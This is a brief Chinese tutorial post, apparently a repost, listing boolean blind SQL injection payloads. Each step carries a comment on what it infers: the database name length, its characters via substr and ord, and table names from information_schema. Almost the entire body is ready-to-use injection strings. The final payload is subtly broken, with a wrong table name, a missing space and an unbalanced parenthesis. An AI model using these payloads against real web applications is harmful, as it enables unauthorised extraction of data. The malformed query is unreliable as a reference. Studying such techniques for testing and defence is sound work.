Boolean (布尔型) 注入攻击

时间:2020-02-29 10:06:13   收藏:0   阅读:143
步骤:
  1‘ and length(database())>=1--+ //判断数据库的长度
  1‘ and substr(database(),1,1)=‘t’ --+ //判断数据库第一个字母的值
  1‘ and substr(database(),2,1)=‘q’ --+ //判断数据库的第二个字母的值
  1‘ and ord(substr(database(),1,1))=115--+ //利用ord和ASCII判断数据库库名
  1‘ and substr(database(),2,1)=’q’--+ //利用substr判断数据库的库名
  1‘ and substr(select table_name from information_schema.table wheretable_schema=‘sql’ limit 0,1),1,1)=‘e’ --+ //利用substr判断数据库的表名

原文:https://www.cnblogs.com/wxj1711652908/p/12381523.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!